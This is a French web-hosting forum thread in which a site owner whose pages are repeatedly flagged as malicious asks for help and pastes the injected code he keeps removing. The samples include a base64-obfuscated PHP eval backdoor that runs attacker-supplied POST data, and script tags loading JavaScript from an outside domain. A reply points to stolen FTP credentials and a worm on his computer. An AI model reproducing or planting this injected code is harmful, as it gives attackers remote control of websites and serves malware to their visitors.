Aller au contenu

Sécurité des sites?


refmaurice

Sujets conseillés

Bonjour tt le monde,

Mon problème est le suivant: mes sites web sont toujours déclarés chez Google " Site Malveillant" sachant que je refaits chaque jour les accées FTP de tous les sites et j'ai bien sécurisé les formulaires avec la fonction PHP "string strip_tags ( string $str [, string $allowable_tags ] )".

Alors je supprime les codes malveillants de toutes les pages et ça me prend beaucoup de temps :wacko: surtout avec des sites qui contiennent beaucoup de pages. J'envoie après le nettoyage des pages un sitemap a Google et j'attends la réponse. Le problème c'est de savoir la ressource des attaques successives et comment se protéger contre ces hakers :?:

Il y a des gens qui m'ont dit que peut être j'ai un fichier caché inclus dans un fichier image ou autre d'où je suis toujours attaqué

Est ce que ça peut être le cas?

J'ai besoin de vos conseils SVP.

Merci d'avance.

Lien vers le commentaire
Partager sur d’autres sites

Bonjour,

Merci pour vos conseils.

Voici un exemple des codes malveillants que je les trouve toujours sur les sites:

Exemple1:

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZDM2MCcpKXtmdW5jdGlvbiBkMzYwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNOeWNITnJhV1JsYzNCdmRDNXZjbWN1Y25NdmMzUmhkSE12YzJ4cGEyVlRkSEpoYm1FekxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBkMzYwMigkYSwkYiwkYywkZCl7Z2xvYmFsJGQzNjAxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRkMzYwMSkpY2FsbF91c2VyX2Z1bmMoJGQzNjAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkMzYwJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnZDM2MCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRkMzYwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZDM2MDInKSkhPSdkMzYwMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

Exemple2:

<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ></script>

Exemple 3:

document.write('<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ><\/script>');
document.write('<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ><\/script>');

Exemple 4:

<edit: supprimé par Dan, un code aussi long n'apporte rien !>

Et le virus que j'ai sur ma machine s'appelle : Worm MyTob.TL

J'attends votre aide SVP.

A bientôt!

Lien vers le commentaire
Partager sur d’autres sites

Regarde les logs d'accès FTP, tu as probablement dû te faire hacker un mot de passe.

C'est relativement facile pour ceux qui utilisent les anciennes versions de Filezilla et/ou n'ont pas d'antivirus à jour !

Si tu as ce virus sur ton ordi, qu'est-ce-que tu attends pour l'éradiquer ?

Lien vers le commentaire
Partager sur d’autres sites

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...